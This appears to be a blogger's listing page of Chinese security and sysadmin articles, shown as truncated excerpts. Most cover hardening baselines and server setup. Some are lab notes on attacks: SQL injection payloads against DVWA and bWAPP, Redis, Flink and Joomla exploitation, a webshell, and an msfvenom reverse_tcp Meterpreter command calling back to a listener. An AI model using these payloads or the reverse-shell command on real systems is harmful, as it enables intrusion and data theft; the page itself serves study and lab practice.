Yanug

原创 SQL注入总结

0x01 什么是SQL注入sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术。0x02 SQL注入的分类按变量类型分数字型字符型按HTTP提交方式分GET注入POST注入Cookie注入按注入方式分报错注入盲注布尔盲注时间盲注union注入编码问题宽字节注入0x03识别后台数据库根据操作系统平台sql server：Windows（IIS)**MySQL：**Apache根据web语言**Microsof

转载 未授权访问漏洞的检测与利用

一、redis未授权访问漏洞漏洞描述redis安装完以后，默认是没有账号密码的（安装redis详细可参考：redis相关笔记，如果redis是以root权限去运行，则可以被反弹shell或者写入ssh密钥，从而被获取服务器的权限。漏洞检测s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host,port))...

原创 Apache Flink RCE 漏洞复现

0x00 简介Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Flink提供了诸多更高抽象层的API以便用户编写分布式任务。0x01 漏洞概述攻击者可直接在Apache Flink Dashboard页面中上传任意jar包，从而达到远程代码执行的目的。0x02 影响版本至目前最新版本Apache Flink 1...

原创 Joomla远程代码执行(RCE)漏洞复现

一、漏洞描述Joomla是一套内容管理系统，是使用PHP语言加上MySQL数据库所开发的软件系统，最新版本为3.9.11，可以在Linux、Windows、MacOSX等各种不同的平台上执行，在CMS评测中获得“最佳开源CMS”奖！1、该CMS对函数过滤不严，导致了远程代码执行漏洞，该漏洞可能导致服务器被入侵、信息泄露等严重风险。2、漏洞位于根目录下的configuration.php ，漏...

原创 Mestasploit 之后渗透测试阶段

Mestasploit – 后渗透测试阶段1. 获得普通账号权限已经获得目标系统控制权后扩大战果提权信息收集渗透内网永久后门基于已有 session 扩大战果msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=4444 -b “\...

原创 Mestasploit 之客户端渗透

Mestasploit — 客户端渗透1. 简介在无法突破网络边界的情况下转而攻击客户端社会工程学攻击进而渗透线上业务网络含有漏洞利用代码的 web 站点利用客户端漏洞含有漏洞利用代码的 doc、pdf等文档诱骗被害者执行 payload2. 攻击 windows诱骗被害者执行 payload （windows）msfvenom –payload-optio...

原创 Mestasploit 之弱点扫描

Mestasploit — 弱点扫描1. 简介根据信息收集结果搜索漏洞利用模块结合外部漏洞扫描系统对大量IP地址段进行批量扫描误判率、漏判率2. VNC 密码破解use auxiliary/scanner/vnc/vnc_loginmsf > use auxiliary/scanner/vnc/vnc_loginmsf auxiliary(scanner/vnc/vn...

原创 Mestasploit 之信息收集

Mestasploit — 信息收集1. db_nmap跟 nmap 用法一样，结果存放在 msf 的数据库中msf > db_nmap -sV 192.168.110.0/242. 主机发现扫描use auxiliary/scanner/discovery/arp_sweep setINTERFACE、RHOSTS、SHOST、SMAC、HREADS；runmsf &g...

原创 bWApp SQL 注入

1.可以显示的字段1' union select 1,2,3,4,5,6,7#2.对mysql用户名主机名，当前数据库的版本信息，当前数据库名称，数据库路径等进行查询和显示。1' union select 1,user(),version(),database(),5,6,7#3.当前数据库下面的表名：1' union select 1,table_name,table_sche...

原创 DVWA SQL注入（低中高三级）

low级1.先进行简单的ID查询输入输入正确的ID，将显示ID First name，Surname信息。2.检测是否可以注入 可知此位为注入点，输入：‘ 返回错误3.尝试遍历数据库表，提示输入的值是ID，可以初步判断此处为数字类型的注入。尝试输入：1 or 1=1没有达到目的，再尝试：1' or' 1' =' 1显示出数据库中所有内容。4.查询字段数1’order by...

原创 curl 详解

获取页面内容当我们不加任何选项使用 curl 时，默认会发送 GET 请求来获取链接内容到标准输出。curl http://www.codebelief.com显示HTTP头如果我们只想要显示 HTTP 头，而不显示文件内容，可以使用 -I 选项：输出为：HTTP/1.1 200 OKServer: nginx/1.10.3Date: Thu, 11 May 2017 08:2...

原创 windows基线加固

1.账号管理与授权1.1删除或锁定可能无用的账户描述删除或锁定无用的账户，定期清理无用账户，防国企用户非法登录检查方法进入“控制面板->管理工具->计算机管理->系统工具-> 本地用户和组”审核不必要的用户和组，审核账户隶属的组权限，审核组用户操作步骤根据系统的要求和实际业务情况，设定不通过账户和账户组，如管理员用户、数据库用户、来宾用户等。1.2删除或锁...

原创 Apache服务器安全配置基线

1.适用情况适用于使用Apahce进行部署的Web网站。2.技能要求熟悉Apache配置文件，能够利用Apache进行建站，并能针对站点使用Apache进行安全加固。3.前置条件1、根据站点开放端口，进程ID，确认站点采用Apache进行部署；2、找到Apache配置文件4.详细操作4.1禁止目录浏览（1）备份httpd.conf配置文件，修改内容：Options Follow...

原创 【中间件安全】Tomcat 安全加固规范

1.适用情况适用于使用Tomcat进行部署的Web网站。2.技能要求熟悉Tomcat配置操作，能够利用Tomcat进行建站，并能针对站点使用Tomcat进行安全加固。3.前置条件1、根据站点开放端口，进程ID，进程名称，确认站点采用Tomcat进行部署；2、找到Tomcat路径：方法一：开始->所有程序>Apache Tomcat->打开文件位置方法二：windo...

原创 网络安全等级保护基本要求-通用表

原创 Web — webshell

环境需求：php服务、redis服务、apache服务开启浏览器访问：服务器IP/index.php利用redis漏洞进入redis交互模式浏览器访问：服务器IP/qwe.php在windows端 使用“中国菜刀”地址后面的小框填写输入的密码点击进入，发现已经获得虚拟机权限右键添加的那一网址，点击“虚拟终端”，可以在内输入命令在虚拟机用tcpdump命令抓流量包，然...

原创 nfs安装及与windows挂载共享

nfs安装及与windows挂载共享步骤：实验需要两台机器，一台作为服务端，一台作为客户端服务端安装两个包nfs-utils和rpcbind：yum install -y nfs-utils rpcbind编辑配置文件，允许共享主机IP：vim /etc/exports添加配置内容为：/home/nfstestdir 服务器IP 最后一位是0/24(rw,sync,all_squash,a...

原创 应急响应

应急响应IRE 应急响应工程师定义：组织为了应对突发/重大信息安全时间的发生所作的准备以及在时间发生后所采取的措施。安全事件影响一个系统正常工作的情况。这里的系统包括主机范畴内的问题，也包括网络范畴内的问题，例如黑客入侵、信息窃取、拒绝服务攻击、网络流量异常等描述：客户的主机或网络正遭到攻击或发现入侵成功的痕迹，而又无法当时解决和追查来源时，安全服务商根据客户的要求以最快的速度赶到现场，...

原创 linux系统下，netstat命令的使用详解

Netstat命令的功能是linux系统下，用于显示网络连接状态、路由表和网络接口信息的工具，可让用户准确判断有哪些网络连接正在运作。如果不带参数使用时，netstat显示会活动 TCP 连接。我们一般用netstat -an 来显示所有连接的端口并用数字表示。一、参数netstat作为系统随带的命令工具，无需安装，直接使用即可！a——显示所有选项。t ——显示tcp相关选项。u——显示...

原创 解读等级保护

什么是等级保护信息安全等级保护是指对国家秘密信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护，对信息系统中使用的信息安全产品实行按等级管理，对信息系统中发生的信息安全事件分等级响应、处置。规定动作：信息系统定级、备案、安全建设整改、等级测评、监督检查。等级保护相关管理机构与分工公安机关是等级保护工作的牵头单位，负责制定政策标准负责...

原创 top 命令详解

09:04:35 up 8:59, 2 users, load average: 0.01, 0.03, 0.05当前时间 系统已运行的时间 当前登录用户的数量 相应最近5、10和15分钟内的平均负载。Tasks: 98 total, 1 running, 97 sleeping, 0 stopped, 0 zombieTasks — 任务（进程）...

原创 ps -aux 命令详解

ps -auxPID：进程ID，进程的唯一标识符USER-域指明了是哪个用户启动了这个命令%CPU-用户可以查看某个进程占用了多少CPU%MEM-内存使用率VSZ-虚拟内存大小RSS-常驻集大小VSZ-表示如果一个程序完全驻留在内存的话需要占用多少内存空间RSS-指明了当前实际占用了多少内存STAT-显示了进程当前的状态STAT状态有很多中，Ss、Ss1、Ss+、S<、...

原创 ICMP协议分析

ICMP协议在学习ICMP协议之前，我们先来回顾下IP协议。IP协议的缺点: 无差错报告和差错纠正机制，缺少一种为主机管理查询的机制。数据在网络中传输必须要封装成IP数据报格式，而IP协议的特点是面向无连接，且不可靠的，可靠性由上层协议来保证，因为IP协议对于数据是尽最大努力传输到目的地的，所以对于数据在网络传输过程中出现了故障时，出错的问题定位和排除非常困难，因为IP协议对于数据的错误的处...

原创 ICMP 消息类型

ICMP 代码合集TYPE CODE Description Query Error0 0 Echo Reply——回显应答（Ping应答） x 3 0 Network Unreachable——网络不可达 x3 1 Host Unreachable——主机不可达 x3 2 Protocol Unreachable——协议不可达 x3 3 Port Unreachab...

原创 HTTP协议分析

HTTP协议简介Hyper Text Transter Protocol什么是超文本（HyperText）？包含有超链接（Link）和各种多媒体元素标记（Markup）的文本。这些超文本文件彼此链接，形成网状（Web），因此又被称为网页（Web Page）。这些链接使用URL表示。最常见的超文本格式是超文本标记语言HTML.什么是URL？URL即统一资源定位符（Uniform Reso...

原创 TCP/IP模型

1.TCP/IP参考模型概述应用层HTTP 80超文本传输协议，提供浏览网页服务Telnet 23远程登录协议，提供远程管理服务FTP 20、21文件传输协议， 提供互联网文件资源共享服务SMTP 25（明文）简单邮件传输协议，提供互联网电子邮件服务POP3 110邮局协议，提供互联网电子邮件服务TFTP 69（UDP）简单文件传输协议，提供简单的文件传输服...

原创 Netcat（nc）的使用详解

NetCat，在网络工具中有“瑞士军刀”美誉，其有Windows和Linux的版本。因为它短小精悍（1.84版本也不过25k，旧版本或缩减版甚至更小）、功能实用，被设计为一个简单、可靠的网络工具，可通过TCP或UDP协议传输读写数据。同时，它还是一个网络应用Debug分析器，因为它可以根据需要创建各种不同类型的网络连接。语法 nc [-hlnruz][-g<网关...>][-G&...

原创 kali最新国内更新源sources.list

打开sources.list文件命令：leafpad /etc/apt/sources.list添加以下更新源：#清华大学deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-...

原创 linux安全基线

1 安全基线与配置核查安全基线：是保持信息系统安全的机密性、完整性、可用性的最小安全控制，是系统的最小安全保证，最基本的安全要求。安全基线包含配置核查，是人员、技术、组织、标准的综合的最低标准要求。同时也涵盖管理类、技术类两个层面配置核查是业务系统及所需设备在特定时期内，根据自身需求、部署环境和承载业务要求应满足的基本安全配置要求合集安全基线的目的： 使服务器通过自身的安全设备保障信息安全...

原创 HTML状态码大全

这些状态码被分为五大类：100-199 用于指定客户端应相应的某些动作。200-299 用于表示请求成功。300-399 用于已经移动的文件并且常被包含在定位头信息中指定新的地址信息。400-499 用于指出客户端的错误。 （自己电脑这边的问题） 自己电脑这边的问题）500-599 用于支持服务器错误。 （对方的问题） 对方的问题）一些常见的状态码为：200 - 服务器成功返回网页...

原创 Linux虚拟机VMware修改root密码

虚拟机忘记root密码，怎么重置1、重启虚拟机，在重启的时候不停的连续按着esc键2.进入该页面后，选中第一个（高亮为选中），按下E键3.会进入界面，按着上下键到最后两行在 rhgb前面添加rw 记得要空格LANG=\ZH_CN.UTF-8后面加下面这一行文字init=/bin/sh4.退出后到这个页面，那一行，表示 初始化成功，然后按步骤输入mount -o rem...

原创 nginx索引目录配置

vim /data/server/nginx/conf/nginx.conf添加 location ~ ^/Installation package(/.*) { root /data/server/nginx; autoindex on; autoindex_exact_size ...

原创 搭建FastDFS+Nginx（Censor7）

【安装步骤】group1的主机IP为192.168.124.91group2的主机对应的ip为192.168.124.245一、安装前准备1、安装依赖包yum -y install pcre* pcre-* gcc-c++ gcc* zlib zlib-devel openssl openssl-devel gc-devel gd gd-devel git2、安装libfastcom...

原创 Linux系统安装Nginx

1，下载安装 nginx，这里是通过wget下载：2，解压 nginx，命令：tar -zxvf nginx-1.16.0.tar.gz3，移动解压目录到/usr/local/src下：mv nginx-1.15.0 /usr/local/src4，编译&安装，进入nginx-1.15.0目录，命令：cd /usr/local/src/nginx-1.15.0./conf...

原创 两ip两主两从部署

IP:192.168.124.122 IP：192.168.124.27环境：centos7一、安装redis步骤 1、首先确认系统中是否存在C语言的编译环境 # gcc -version或者 # g++ --versionyum install -y gcc 步骤 2、下载redis安装包wget http://download.redis.io/releases/r...

原创 NFS服务搭建与配置

一．（linux之间）NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，它允许网络中的计算机之间共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。实验需要两台机器，一台作为服务端，一台作为客户端服务端安装两个包nfs-utils和rpcbindyum install -y...

原创 lnmp环境下搭建 wordpress

Lnmp 环境搭建LNMP是指一组通常一起使用来运行动态网站或者服务器的自由软件名称首字母缩写。L指Linux，N指 Nginx，M一般指MySQL，也可以指MariaDB，P一般指PHP，也可以指Perl或Python。源码安装 nginx首先在根目录递归创建/data/servermkdir -p /data/server下载依赖包yum -y install openssl op...

原创 搭建 confluence wiki

1.安装mariadb，启动并设置开机自启yum -y install mariadb mariadb-serversystemctl start mariadb 启动mariadbsystemctl enable mariadb 设置开机自动启动2.接下来进行MariaDB的相关配置，输入以下命令开启简单配置mysql_secure_installation3...

原创 Linux下搭建ntp时间服务器

NTP是Network Time Protocol的缩写，又称为网络时间协议。是用来使计算机时间同步化的一种协议，它可以使计算机对其服务器或时钟源（如石英钟，GPS等等)做同步化，它可以提供高精准度的时间校正（LAN上与标准间差小于1毫秒，WAN上几十毫秒），且可介由加密确认的方式来防止恶毒的协议攻击。条件：两个虚拟机 一台服务端、一台客户端服务端配置：1.安装ntp服务yum insta...

原创 csvn的搭建，用TortoiseSVN上传下载。

首先要提前下载好JDK在网上找到他的源码包开始下载到/usr/local/src。下载之后解压rpm -qa | grep java （找到的全部卸载）rpm -e --nodeps （加软件包名卸载）然后解压javatar -zxvf jdk-8u211-linux-x64.tar.gz -C /usr/local/mv /usr/local/jdk1.8.0_211 javavi...